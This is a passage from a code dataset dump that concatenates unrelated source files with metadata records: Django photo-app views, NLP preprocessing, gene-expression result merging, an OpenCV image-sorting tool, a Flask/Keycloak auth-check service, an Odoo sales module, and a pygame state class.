PhotoForm\nfrom django.contrib import messages\nfrom django.views.decorators.http import require_POST\nfrom .models import Photo, Category\n\n# Create your views here. 
additions below\n# Display the top page\ndef index(request):\n # Fetch all Photo instances\n photos = Photo.objects.all().order_by('-created_at')\n # Pass the fetched Photo instances to the template\n return render(request, 'app/index.html', {'photos': photos})\n\n\n# Display the user page\ndef users_detail(request, pk):\n # Assign the registered user to 'user', or return a 404 if none exists\n user = get_object_or_404(User, pk=pk)\n # Fetch the list of photos linked to the user\n photos = user.photo_set.all().order_by('-created_at')\n # Add photos to the context\n return render(request, 'app/users_detail.html', {'user': user, 'photos': photos})\n\n\n# Display the signup page\ndef signup(request):\n # Create the user from the POSTed data\n if request.method == 'POST':\n # Create a User instance\n form = UserCreationForm(request.POST)\n if form.is_valid():\n # Save the User instance\n form.save()\n # Receive the entered username\n input_username = form.cleaned_data['username']\n # Receive the entered password\n input_password = form.cleaned_data['password1']\n # Returns a user object if the form input authenticates, otherwise None\n new_user = authenticate(\n # Returns a User object when the given credentials authenticate, otherwise None\n username=input_username,\n password=input_password,\n )\n # Log the user in only when authentication succeeds\n if new_user is not None:\n # The login function can log a user in even without authentication (authentication is done by authenticate above)\n # It takes the request and a User object and switches the session from logged-out to logged-in\n login(request, new_user)\n # Display the user detail page\n return redirect('app:users_detail', pk=new_user.pk)\n else:\n form = UserCreationForm()\n # Display the signup page\n return render(request, 'app/signup.html', {'form': form})\n\n\n# Display the photo upload page\n@login_required # decorator: if not logged in, redirect to the login page (LOGIN_URL set in settings.py) without running the view; only logged-in users reach the function\ndef photos_new(request):\n # Build the form from the POSTed data\n if request.method == \"POST\":\n # Create a Photo instance\n form = PhotoForm(request.POST, request.FILES)\n if form.is_valid():\n # Build a Photo instance from the input\n photo = form.save(commit=False)\n # Assign request.user (the User who posted the photo) to the Photo's user field\n photo.user = request.user\n # Save the Photo instance to the database\n photo.save()\n # Show a success message when the upload completes\n messages.success(request, \"Your post has been submitted!\")\n # Display the user detail page\n return redirect('app:users_detail', pk=request.user.pk)\n else:\n form = PhotoForm()\n # Display the new photo upload page\n return render(request, 'app/photos_new.html', {'form': form})\n\n\n# Display the photo detail page\ndef photos_detail(request, pk):\n # Assign the photo to 'photo', or return a 404 if none exists\n photo = get_object_or_404(Photo, pk=pk)\n # Display the photo detail page\n return render(request, 'app/photos_detail.html', {'photo': photo})\n\n\n# Delete a post\n@require_POST\ndef photos_delete(request, pk):\n # Assign the photo to 'photo', or return a 404 if none exists\n photo = get_object_or_404(Photo, pk=pk, user=request.user)\n # Delete the posted photo\n photo.delete()\n # Display the user detail page\n return redirect('app:users_detail', request.user.id)\n\n\n# Display the per-category page\ndef photos_category(request, category):\n # Fetch the Category instance whose title matches the URL string\n category = get_object_or_404(Category, title=category)\n # Fetch the Photos belonging to the fetched Category\n photos = Photo.objects.filter(category=category).order_by('-created_at')\n # Render and display the top page\n return render(\n request, 'app/index.html', {'photos': photos, 'category': category}\n )","sub_path":"PhotoService/PhotoService/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"172214876","text":"import hyperparameters\nimport sentencepiece as spm\nimport os\nimport errno\nimport sys\n\n\"\"\"\nScript to preprocess downloaded data files\n\nCommand line call template:\n \n preprocess.py \n\n model_name: name of saved_weights file to load.\n dataset_path: path to dataset 
files location, e.g. \"D:/Datasets/de-en\".\n\"\"\"\n\n\ndef preprocess(root_dir: str, hp_dict: dict):\n    print(\"Checking files exist\")\n\n    train_de = root_dir + \"/train.tags.de-en.de\"\n    train_en = root_dir + \"/train.tags.de-en.en\"\n    eval_de = root_dir + \"/IWSLT16.TED.tst2013.de-en.de.xml\"\n    eval_en = root_dir + \"/IWSLT16.TED.tst2013.de-en.en.xml\"\n    test_de = root_dir + \"/IWSLT16.TED.tst2014.de-en.de.xml\"\n    test_en = root_dir + \"/IWSLT16.TED.tst2014.de-en.en.xml\"\n\n    # Check files exist\n    for f in (train_en, train_de, eval_en, eval_de, test_en, test_de):\n        if not os.path.isfile(f):\n            raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), f)\n\n    print(\"Reformatting files\")\n\n    reformat_dir = root_dir + \"/reformat\"\n    os.makedirs(reformat_dir, exist_ok=True)\n\n    train_de_prepro = reformat_plain(train_de, reformat_dir + \"/train.de\")\n    train_en_prepro = reformat_plain(train_en, reformat_dir + \"/train.en\")\n    assert len(train_de_prepro) == len(train_en_prepro)\n\n    eval_de_prepro = reformat_xml(eval_de, reformat_dir + \"/eval.de\")\n    eval_en_prepro = reformat_xml(eval_en, reformat_dir + \"/eval.en\")\n    assert len(eval_de_prepro) == len(eval_en_prepro)\n\n    test_de_prepro = reformat_xml(test_de, reformat_dir + \"/test.de\")\n    test_en_prepro = reformat_xml(test_en, reformat_dir + \"/test.en\")\n    assert len(test_de_prepro) == len(test_en_prepro)\n\n    write_file(reformat_dir + \"/train\", train_de_prepro + train_en_prepro)\n\n    print(\"Training a joint BPE model with sentencepiece\")\n\n    segmented_dir = root_dir + \"/segmented\"\n    os.makedirs(segmented_dir, exist_ok=True)\n\n    parameters = '--input={}/train --pad_id=0 --unk_id=1 \\\n        --bos_id=2 --eos_id=3\\\n        --model_prefix={}/bpe --vocab_size={} \\\n        --model_type=bpe'.format(reformat_dir, segmented_dir, hp_dict[\"vocab_size\"])\n    spm.SentencePieceTrainer.Train(parameters)\n\n    print(\"Segmenting files using bpe model\")\n\n    sp = spm.SentencePieceProcessor()\n    sp.Load(segmented_dir + \"/bpe.model\")\n\n    segment(train_de_prepro, segmented_dir + \"/train.de.bpe\", sp)\n    segment(train_en_prepro, segmented_dir + \"/train.en.bpe\", sp)\n    segment(eval_de_prepro, segmented_dir + \"/eval.de.bpe\", sp)\n    segment(eval_en_prepro, segmented_dir + \"/eval.en.bpe\", sp)\n    segment(test_de_prepro, segmented_dir + \"/test.de.bpe\", sp)\n    segment(test_en_prepro, segmented_dir + \"/test.en.bpe\", sp)\n\n\ndef reformat_plain(file_path: str, new_path: str):\n    lines = []\n    with open(file_path, \"r\", encoding=\"utf8\") as file, open(new_path, \"w\", encoding=\"utf8\") as new_file:\n        for line in file.read().split(\"\\n\"):\n            if not line.startswith(\"<\"):\n                new_line = line.strip()\n                lines.append(new_line)\n                new_file.write(new_line + \"\\n\")\n    return lines\n\n\ndef reformat_xml(file_path: str, new_path: str):\n    lines = []\n    with open(file_path, \"r\", encoding=\"utf8\") as file, open(new_path, \"w\", encoding=\"utf8\") as new_file:\n        for line in file.read().splitlines():\n            # Keep only the sentence payload of <seg ...>...</seg> lines:\n            # everything between the first '>' and the '<' that follows it.\n            if line.startswith(\"<seg\"):\n                start = 0\n                end = len(line)\n                for i, char in enumerate(line):\n                    if char == \">\" and start == 0:\n                        start = i + 1\n                    else:\n                        if char == \"<\" and start > 0:\n                            end = i\n                            break\n                new_line = line[start:end].strip()\n                lines.append(new_line)\n                new_file.write(new_line + \"\\n\")\n    return lines\n\n\ndef segment(lines: list, file_path: str, sp: spm.SentencePieceProcessor):\n    with open(file_path, \"w\", encoding=\"utf8\") as file:\n        for line in lines:\n            pieces = sp.encode_as_pieces(line)\n            file.write(\" \".join(pieces) + \"\\n\")\n\n\ndef write_file(file_path: str, lines: list):\n    with open(file_path, 'w', encoding=\"utf8\") as file:\n        for line in lines:\n            file.write(line + 
\"\\n\")\n\n\nif len(sys.argv) == 2:\n data_path_p = sys.argv[1:]\nelse:\n data_path_p = \"D:/Datasets/de-en\"\n\npreprocess(data_path_p, hyperparameters.hp_dict)\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"574884642","text":"import pandas\nfrom functools import reduce\n\n#parameters\nfile_dir = '/data/CCBR/projects/ccbr1109/rnaseq/'\noutput_dir = '/data/CCBR/projects/ccbr1109/analysis/deg_data/'\ndate_in = '20210811'\nDEG_list = ['HNPK_SH1-SCR','HNPK_SH2-SCR','GCN1_SH2-SCR']\n\n#read in file\ndef readdf(filename):\n data=pandas.read_csv(filename,sep=\"\\t\",header=0,usecols=[\"ensid_gene\",\"fc\",\"fdr\",\"gsea_ranking_score\"])\n new = data[\"ensid_gene\"].str.split(\"|\", n = 0, expand = True)\n data['ensid']=new[0]\n data.drop(columns=['ensid_gene'],inplace=True)\n data=data[[\"ensid\",\"fc\",\"fdr\",\"gsea_ranking_score\"]]\n return data\n\n#create df with fc and fdr only\ndef merge_fc(type_in):\n flag=1\n\n for comps in DEG_list:\n tmp = readdf(file_dir + \"DEG_\" + comps + \"_1_1/\" + type_in + \"_DEG_\" + comps + \"_all_genes.txt\")\n tmp.drop(columns=['gsea_ranking_score'],inplace=True)\n tmp.columns = [\"gene\",comps + \".fc\", comps + \".fdr\"]\n\n if flag==1:\n mergeddf = tmp\n flag=2\n else:\n #merge df's\n mergeddf=reduce(lambda a,b:pandas.merge(a,b,how=\"outer\",on=\"gene\"),[tmp,mergeddf]) \n\n #clean merge df's\n mergeddf.fillna(' ',inplace=True)\n mergeddf.drop_duplicates(inplace=True)\n mergeddf.to_csv(output_dir + \"merged_deg_fc_\" + type_in + \"_\" + date_in + \".txt\",sep=\"\\t\",index=False)\n\n#create df with fc fdr and gsea\ndef merge_gsea(type_in):\n flag = 1\n\n for comps in DEG_list:\n tmp = readdf(file_dir + \"DEG_\" + comps + \"_1_1/\" + type_in + \"_DEG_\" + comps + \"_all_genes.txt\")\n tmp.columns = [\"gene\", comps + \".fc\", comps + \".fdr\", comps + \".gsea\"]\n\n if flag==1:\n mergeddf = tmp\n flag=2\n else:\n #merge df's\n mergeddf=reduce(lambda a,b:pandas.merge(a,b,how=\"outer\",on=\"gene\"),[tmp,mergeddf]) \n\n #clean merge df's\n mergeddf.fillna(' ',inplace=True)\n mergeddf.drop_duplicates(inplace=True)\n mergeddf.to_csv(output_dir + \"merged_deg_gsea_\" + type_in + \"_\" + date_in + \".txt\",sep=\"\\t\",index=False)\n\n#generate df for deg analysis\nmerge_fc(\"DESeq2\")\nmerge_fc(\"limma\")\n \n#create gsea df\nmerge_gsea(\"DESeq2\")\nmerge_gsea(\"limma\")","sub_path":"scripts/create_merged_degs.py","file_name":"create_merged_degs.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"623597052","text":"# coding=utf-8\nimport random\n\nimport cv2\nimport numpy as np\nimport os, shutil\n\n\ndef mymovefile(srcfile, dstfile):\n if not os.path.isfile(srcfile):\n print(\"%s not exist!\" % (srcfile))\n else:\n fpath, fname = os.path.split(dstfile) # 分离文件名和路径\n if not os.path.exists(fpath):\n os.makedirs(fpath) # 创建路径\n try:\n shutil.move(srcfile, dstfile) # 移动文件\n print(\"move %s -> %s\" % (srcfile, dstfile))\n except:\n print('warning! 
no such file!')\n\n\ndef merge_img(images):\n    l = len(images) // 3\n    img_up = np.hstack(images[:l])\n    img_middle = np.hstack(images[l:l * 2])\n    img_down = np.hstack(images[l * 2:])\n    img = np.vstack([img_up, img_middle, img_down])\n    return img\n\n\ndef on_mouse(event, x, y, flags, param):\n    global name_list, move_dir, merge, img_shape\n\n    if event == cv2.EVENT_LBUTTONDOWN:\n        l = len(name_list) // 3\n        id = x // img_shape[1] + (y // img_shape[0]) * l\n        cv2.putText(merge, str(id) + ':', (x - 100, y), cv2.FONT_HERSHEY_COMPLEX, 2.0, (0, 0, 255), 2)\n        cv2.putText(merge, os.path.split(name_list[id])[-1], (x, y), cv2.FONT_HERSHEY_COMPLEX, 2.0, (0, 0, 255), 2)\n        print(id)\n        cv2.imshow('image', merge)\n        mymovefile(name_list[id], move_dir)\n        mymovefile(name_list[id][:-4] + '_mask.png', move_dir)\n\n\ndef batch_cls_imgs(img_path, all_l=9):\n    global name_list, move_dir, merge, img_shape\n    move_dir = img_path + '/点击挑选出来的/'  # output folder, literally \"picked by clicking\"\n\n    list = os.listdir(img_path)\n    img_list = []\n    for i in range(0, len(list)):\n        path = os.path.join(img_path, list[i])\n        if os.path.isfile(path) and \\\n                path.endswith('.png') is True and \\\n                path.endswith('mask.png') is False and \\\n                path.endswith('pred.png') is False and \\\n                path.endswith('display.png') is False:\n            img_list.append(i)\n\n    img_list = sorted(img_list)\n    print(img_list)\n    i = 0\n    while True:\n        temp_list = []\n        name_list = []\n        for j in range(all_l):\n            image_path = os.path.join(img_path, list[img_list[i]])\n            image = cv2.imread(image_path)\n            if image is None:\n                image = np.zeros(img_shape, dtype=np.uint8)\n            img_shape = image.shape\n            temp_list.append(image)\n            name_list.append(image_path)\n            i += 1\n        print(i)\n\n        merge = merge_img(temp_list)\n\n        cv2.namedWindow('image', 0)\n        cv2.setMouseCallback('image', on_mouse)\n        cv2.imshow('image', merge)\n\n        key = chr(cv2.waitKeyEx(0) & 255)\n\n        if key in ['z', 'Z']:\n            i = i - all_l * 2\n\n\nif __name__ == '__main__':\n    # Split the files into ok and ng\n    # cls_good_ng()\n    # Batch classification\n    batch_cls_imgs(img_path='/home/pi/Desktop/df1b_dataset/20191024/small_img_train/bg', all_l=21)\n","sub_path":"tools/点击分类工具.py","file_name":"点击分类工具.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"541239653","text":"# Usage: python script_eye_tracking.py <eval_file> <source_directory> [<destination_directory>]\nimport multiprocessing as mp\nimport subprocess as sp\nimport random, string, math, sys, os, re, time, heapq\n\ndef analyse_text(eval_file, source_filelist, destination_filelist, idx):\n    log = []\n    i = 0\n    for s_file, d_file in zip(source_filelist, destination_filelist):\n        command = \"python \" + re.escape(eval_file) + \" \" + re.escape(s_file) + \" \" + re.escape(os.path.dirname(d_file))\n        # command = \"python gibber\"\n        # print(\"command:\", command)\n        try:\n            exec_value = os.system(command)\n            if exec_value:\n                print(sp.check_output(command))\n            else:\n                # output.put((idx + i, s_file + \": Done\"))\n                log.append((idx + i, s_file + \": Done\"))\n        except:\n            # output.put((idx + i, s_file + \": Error\"))\n            log.append((idx + i, s_file + \": Error\"))\n        i = i + 1\n        # print(s_file)\n    return log\n\ndef k_partition(combined_filelist, k):\n    source_filelist, destination_filelist, heap_filesize = [], [], []\n    for i in range(k):\n        heapq.heappush(heap_filesize, (0, i))\n        source_filelist.append([])\n        destination_filelist.append([])\n    combined_filelist.sort(key=lambda detail: detail[2], reverse=True)\n    for s_file, d_file, size_file in combined_filelist:\n        heap_filesize_top = heapq.heappop(heap_filesize)\n        
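# A minimal sketch (with hypothetical sizes) of the greedy rule used here --\n        # longest-processing-time scheduling: each file, largest first, goes to\n        # whichever of the k buckets currently holds the fewest bytes:\n        #   sizes = [9, 7, 5, 4]; loads = [(0, 0), (0, 1)]  # (total_bytes, bucket)\n        #   for s in sorted(sizes, reverse=True):\n        #       total, b = heapq.heappop(loads)\n        #       heapq.heappush(loads, (total + s, b))\n        #   # -> final loads: bucket 0 gets 9+4=13, bucket 1 gets 7+5=12\n        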
source_filelist[heap_filesize_top[1]].append(s_file)\n destination_filelist[heap_filesize_top[1]].append(d_file)\n heapq.heappush(heap_filesize, (heap_filesize_top[0] + size_file, heap_filesize_top[1]))\n # print(\"heap_filesize:\", heap_filesize)\n return source_filelist, destination_filelist\n\nif __name__ == '__main__':\n start_time = time.time()\n\n output = mp.Queue()\n\n program_name = sys.argv[0]\n eval_file = \"\"\n source_directory = \"\"\n destination_directory = \"\"\n suffix = \"_analysis\"\n separater = \".\"\n extension = \"csv\"\n\n if len(sys.argv) < 2:\n print(\"No evaluating python file provided\")\n sys.exit()\n elif len(sys.argv) < 3:\n print(\"No source directory provided\")\n sys.exit()\n elif len(sys.argv) < 4:\n print(\"No destination directory provided; setting source directory as destination directory\")\n eval_file = sys.argv[1]\n source_directory = destination_directory = sys.argv[2]\n else:\n eval_file = sys.argv[1]\n source_directory = sys.argv[2]\n destination_directory = sys.argv[3]\n\n source_filelist = []\n destination_filelist = []\n combined_filelist = []\n\n # Listing all the files\n filelist = os.popen(\"find \" + re.escape(source_directory) + \" -name *sample_report\" + separater + extension).read()\n filelist = filelist.split('\\n')\n filelist = list(filter(None, filelist))\n # print(len(filelist))\n for filename in filelist:\n # print(filename)\n dir = os.path.dirname(filename)\n file = os.path.basename(filename)\n # print(dir, '/', file)\n # print(os.path.abspath(os.path.join(os.path.join(source_directory, dir), file)))\n source_file = os.path.abspath(os.path.join(dir, file))\n # print(source_file)\n # print(filename[(filename.index(source_directory) + len(source_directory)) + 1:].split(os.sep)[0])\n directory = os.path.join(destination_directory, filename[(filename.index(source_directory) + len(source_directory)) + 1:].split(os.sep)[0] + suffix)\n try:\n os.stat(directory)\n except:\n os.mkdir(directory)\n destination_file = os.path.abspath(os.path.join(directory, os.path.splitext(os.path.basename(file))[0] + suffix + separater + extension))\n # print(destination_file)\n combined_filelist.append((source_file, destination_file, os.path.getsize(source_file)))\n\n # sys.exit()\n\n # Sort all files based on the file size\n combined_filelist.sort(key=lambda filename: filename[2], reverse=True)\n\n # for s_file, d_file, filesize in combined_filelist:\n # print(s_file, d_file, filesize)\n # print(s_file, filesize)\n # print(filesize)\n # sys.exit()\n\n n = min(mp.cpu_count(), len(combined_filelist)) # # of partition to be made of filelist for optimized results\n\n # Rearranging files accordingly\n\n source_filelist, destination_filelist = k_partition(combined_filelist, n)\n\n # for i in range(n):\n # source_filelist.append(list(map(lambda x: x[0], combined_filelist[i::n])))\n # destination_filelist.append(list(map(lambda x: x[1], combined_filelist[i::n])))\n # print(i, sum(list(map(lambda x: x[2], combined_filelist[i::n]))))\n\n # print(source_filelist)\n # print(destination_filelist)\n # print('\\n\\n'.join('\\n'.join(s_list) for s_list in source_filelist))\n # print('\\n\\n'.join('\\n'.join(d_list) for d_list in destination_filelist))\n # sys.exit()\n\n # processes = [mp.Process(target = analyse_text, args = (eval_file, source_filelist[x], destination_filelist[x], x, output)) for x in range(n)]\n #\n # for p in processes:\n # p.start()\n #\n # for p in processes:\n # p.join()\n #\n # results = [output.get() for p in processes]\n # results.sort()\n # 
results = [r[1] for r in results]\n # print('\\n'.join(results))\n\n pool = mp.Pool(processes=n)\n output = [pool.apply_async(analyse_text, args = (eval_file, source_filelist[x], destination_filelist[x], x*math.ceil(len(source_filelist)/n),)) for x in range(n)]\n\n # output = [mp.Process(target = analyse_text, args = (eval_file, source_filelist[x*math.ceil(len(source_filelist)/n):(x+1)*math.ceil(len(source_filelist)/n)], destination_filelist[x*math.ceil(len(destination_filelist)/n):(x+1)*math.ceil(len(destination_filelist)/n)], x*math.ceil(len(source_filelist)/n),)) for x in range(n)]\n # for p in output:\n # p.start()\n # for p in output:\n # p.join()\n\n results = []\n for p in output:\n results = results + p.get()\n results.sort()\n results = [r[1] for r in results]\n print('\\n'.join(results))\n end_time = time.time()\n\n print(\"Time taken:\\t\", math.floor((end_time - start_time)/60), \"min\", math.floor((end_time - start_time)%60), \"sec\")\n","sub_path":"script_eye_tracking.py","file_name":"script_eye_tracking.py","file_ext":"py","file_size_in_byte":6286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"586917313","text":"# -*- coding: utf-8 -*-\nfrom openerp import models, fields, api\n\nclass sale_order(models.Model):\n _inherit = 'sale.order'\n \n @api.model\n def _find_sale_man_id(self,partner_shipping_id,section_id=None):\n \n if section_id is None:\n section_id = self.env.user.default_section_id.id\n \n if not partner_shipping_id or not section_id:\n return None\n \n corr_obj = self.env['res.user.zip.rel']\n exception_obj = self.env['res.partner.sale.exception']\n addr = self.env['res.partner'].browse(partner_shipping_id)\n if addr.parent_id:\n partner = addr.parent_id\n else:\n partner = addr\n \n partner_exceptions = exception_obj.search([('partner', '=', partner.id), ('department', '=', section_id)])\n if partner_exceptions:\n sale_exception = partner_exceptions[0]\n return sale_exception.user.id\n \n corr_ids = corr_obj.search([('zip_min', '<=', addr.zip), ('zip_max', '>=', addr.zip), ('department', '=',section_id)])\n if corr_ids:\n corr = corr_ids[0]\n return corr.user.id\n return None\n \n \n @api.multi\n def onchange_delivery_id(self,company_id, partner_id, partner_shipping_id, fiscal_position):\n res = super(sale_order,self).onchange_delivery_id(company_id, partner_id, partner_shipping_id, fiscal_position)\n \n res['value'].update({'user_id': self._find_sale_man_id(partner_shipping_id),\n 'section_id' : self.env.user.default_section_id.id\n })\n \n return res\n\nsale_order()\n\n","sub_path":"seller_area/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"290867124","text":"# -*- coding: utf-8 -*-\r\nclass Solution:\r\n '''\r\n Compare Version Numbers\r\n \r\n Compare two version numbers version1 and version2.\r\n If version1 > version2 return 1, if version1 < version2 return -1, otherwise return 0.\r\n \r\n You may assume that the version strings are non-empty and contain only digits and the . character.\r\n The . 
character does not represent a decimal point and is used to separate number sequences.\r\n For instance, 2.5 is not \"two and a half\" or \"half way to version three\", it is the fifth second-level revision of the second first-level revision.\r\n \r\n Here is an example of version numbers ordering:\r\n \r\n 0.1 < 1.1 < 1.2 < 13.37\r\n \r\n Tags:\r\n String\r\n '''\r\n\r\n # @param version1, a string\r\n # @param version2, a string\r\n # @return an integer\r\n def compareVersion(self, version1, version2):\r\n digits1 = version1.split('.')\r\n digits2 = version2.split('.')\r\n n1 = len(digits1)\r\n n2 = len(digits2)\r\n i = 0\r\n while i < max(n1, n2):\r\n if i >= n1:\r\n v1 = 0\r\n else:\r\n v1 = int(digits1[i])\r\n if i >= n2:\r\n v2 = 0\r\n else:\r\n v2 = int(digits2[i])\r\n v = v1 - v2\r\n if v < 0:\r\n return -1\r\n elif v > 0:\r\n return 1\r\n else:\r\n i += 1\r\n return 0\r\n","sub_path":"problem165.py","file_name":"problem165.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"240572459","text":"# Copyright 2018 InfAI (CC SES)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport os\nimport sys\nimport requests\nfrom flask import Flask, request, abort\nfrom flask_cors import CORS\nfrom flask_restx import Api, Resource, fields\n\napplication = Flask(\"auth-check\")\napplication.config.SWAGGER_UI_DOC_EXPANSION = 'list'\nCORS(application)\napi = Api(application, version='0.1', title='auth-check API',\n description='auth-check API')\n\n\n@api.route('/doc')\nclass Docs(Resource):\n def get(self):\n return api.__schema__\n\n\nns = api.namespace('check', description='Operations related to checking authentication and authorization')\n\ncheck_model = api.model('check', {\n 'headers': fields.String(required=True, description='json with target_uri, target_method and authorization header')\n})\n\ncheck_return = api.model('check_return', {\n 'userID': fields.String(required=False, description='user id'),\n 'roles': fields.List(fields.String(description=\"A role of the user\"))\n})\n\nerror_return = api.model('error_return', {\n 'message': fields.String(required=False, description='a error message')\n})\n\n# INIT\ntry:\n client_id = os.environ[\"client_id\"]\n client_secret = os.environ[\"client_secret\"]\n keycloak_url = os.environ[\"keycloak_url\"]\n keycloak_url = \"{url}/auth/realms/master/protocol/openid-connect/token/introspect\".format(url=keycloak_url)\n ladon_url = os.environ[\"ladon_url\"]\n ladon_url = \"{url}/access\".format(url=ladon_url)\nexcept KeyError as ke:\n print(str(ke))\n sys.exit(\"Could not initialize. Make sure environment variables are set. 
See missing env above/below\")\n\ntry:\n debug = os.environ[\"debug\"] == \"True\"\nexcept KeyError:\n debug = False\n\nif debug:\n print(\"debug mode: ON\")\n print(\"\\tremove environment 'debug' or set to anything else than 'True' to disable\")\nelse:\n print(\"debug mode: OFF\")\n print(\"\\tset environment 'debug' to 'True' to enable\")\n\ntry:\n dontCheckAuthorization = os.environ[\"dontCheckAuthorization\"] == \"True\"\nexcept KeyError:\n dontCheckAuthorization = False\n\nif dontCheckAuthorization:\n print(\"WARNING: Not checking authorization. Do not deploy with this settings!\")\n\n# Utility\ndef log_debug(string):\n if debug:\n print(string)\n\ndef extract_roles(result_authentication):\n return result_authentication.get(\"realm_access\").get(\"roles\")\n\n\ndef check_user_authorization(result_authentication, headers):\n action = headers.get(\"target_method\")\n resource = headers.get(\"target_uri\")\n roles = extract_roles(result_authentication)\n\n for role in roles:\n access_policy_request = {\n \"Subject\": role,\n \"Action\": action,\n \"Resource\": (\"endpoints\" + resource).replace(\"/\", \":\")\n }\n\n log_debug((\"check authorization for: \" + json.dumps(access_policy_request)))\n log_debug(\"send authorization request to: \" + ladon_url)\n response = requests.post(ladon_url, data=json.dumps(access_policy_request)).json()\n log_debug(\"authorization response: \" + str(json.dumps(response)))\n if response:\n if response.get(\"Result\"):\n return True # As long as one role is allowed\n # No role allowed -> return False\n return False\n\n\ndef check_authentication(token):\n data = {\n \"client_id\": client_id,\n \"client_secret\": client_secret,\n \"token\": token,\n \"token_type_hint\": \"access_token\"\n }\n\n try:\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\n log_debug(\"send token validation request to: \" + keycloak_url)\n response = requests.post(keycloak_url, data=data, headers=headers)\n response = response.json()\n log_debug(\"token validation response: \" + str(json.dumps(response)))\n if response.get(\"active\"):\n log_debug(\"access token is valid\")\n return response, None\n else:\n log_debug(\"access token is not valid\")\n error_message = response.get(\"error_description\")\n log_debug(error_message)\n if error_message:\n log_debug(error_message)\n return False, error_message\n else:\n return False, \"Access Token is not valid\"\n except Exception as e:\n print(str(e))\n return False, \"Access Token could not be checked\"\n\n\ndef check_client_authorization(result_authentication):\n \"\"\"\n if endpoint == \"/iot-repo\" and method == \"POST\":\n if scope != \"write:process\":\n return False\n elif endpoint == \"/process-repo\" and method == \"POST\":\n if scoe != \"write:process\":\n return False\n \"\"\"\n return None\n\n\n@ns.route('/', strict_slashes=False)\nclass Operator(Resource):\n @api.expect(check_model)\n @api.marshal_with(check_return, code=201)\n @api.response(400, 'Bad request', error_return)\n @api.response(401, 'Unauthorized, see message', error_return)\n @api.response(403, 'Forbidden, see message', error_return)\n @api.response(500, 'Internal Server Error', error_return)\n @api.response(502, 'Bad Gateway', error_return)\n def post(self):\n if request.headers.get('Content-Type') != \"application/json\":\n abort(400, \"Can only handle Content-Type: application/json\")\n else:\n payload = request.get_json()\n log_debug(\"Payload: \" + str(json.dumps(payload)))\n headers = payload.get(\"headers\")\n params = 
payload.get(\"uri_args\")\n method = headers.get(\"target_method\")\n authorization_header = headers.get(\"authorization\")\n log_debug(authorization_header)\n if not authorization_header:\n if isinstance(params, dict):\n authorization_header = params.get(\"token\")\n log_debug(authorization_header)\n\n if method == \"OPTIONS\":\n log_debug(\"OPTIONS request is allowed\")\n # TODO: check in middleman if user id ist da\n # sollte eigentlich nicht mit gesendet werden\n payload = json.dumps({\"userID\": \"\"})\n return payload, 200\n\n else:\n if authorization_header:\n token = authorization_header.split(\" \")[-1]\n\n result_authentication, error_authentication = check_authentication(token)\n\n if result_authentication:\n log_debug(\"authentication was successful\")\n try:\n if not dontCheckAuthorization:\n result_authorization = check_user_authorization(result_authentication, headers)\n else:\n result_authorization = True\n except Exception as e:\n print(str(e))\n abort(502, \"Authorization could not be checked\")\n\n if result_authorization:\n result_client_authorization = check_client_authorization(result_authentication)\n log_debug(\"authorization was successful\")\n roles = extract_roles(result_authentication)\n log_debug(\"roles: \" + str(roles))\n payload = {\"userID\": result_authentication.get(\"sub\"), \"roles\": roles}\n return payload, 200\n else:\n abort(403, \"missing authorization\")\n else:\n if error_authentication == \"Access Token could not be checked\":\n abort(502, error_authentication)\n abort(401, error_authentication)\n else:\n log_debug(\"missing access token -> unauthorized\")\n abort(401, \"missing access token\")\n\n\nif __name__ == \"__main__\":\n application.run(\"0.0.0.0\", os.getenv('PORT', 5000), debug=False)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"420227152","text":"\"\"\"\nType stubs for pytest.\nNote that stubs are only written for the parts that we use.\n\"\"\"\n\nfrom typing import Any, ContextManager, Optional, Pattern, Tuple, Type, TypeVar, Union\n\nfrom _pytest._code import ExceptionInfo\n\n_E = TypeVar(\"_E\", bound=BaseException)\n\ndef raises(\n expected_exception: Union[\"Type[_E]\", Tuple[\"Type[_E]\", ...]],\n *args: Any,\n match: Optional[Union[str, Pattern[Any]]] = None,\n **kwargs: Any\n) -> ContextManager[Optional[ExceptionInfo]]: ...\n","sub_path":"stubs/pytest.pyi","file_name":"pytest.pyi","file_ext":"pyi","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"357256094","text":"import pygame\n\nfrom core.statemachine import AbstractState\n\n\nfrom core.UI import TextOptionsUIPanel, TextPanel, TextUIOption\n\n\nclass LevelCompleteState(AbstractState):\n def __init__(self, state_machine):\n super().__init__(state_machine)\n self.complete_options_panel = None\n self.complete_text_panel = None\n self.complete_score_panel = None\n self.current_save = None\n self.current_level = None\n self.steps = None\n self.surf = None\n self.background_surf = None\n self.options = []\n self.save_manager = None\n\n def enter(self, persisted_data, current_time):\n super().enter(persisted_data, current_time)\n self.current_save = self.data_to_persist[\"save_data\"]\n self.steps = self.data_to_persist[\"steps\"]\n self.current_level = 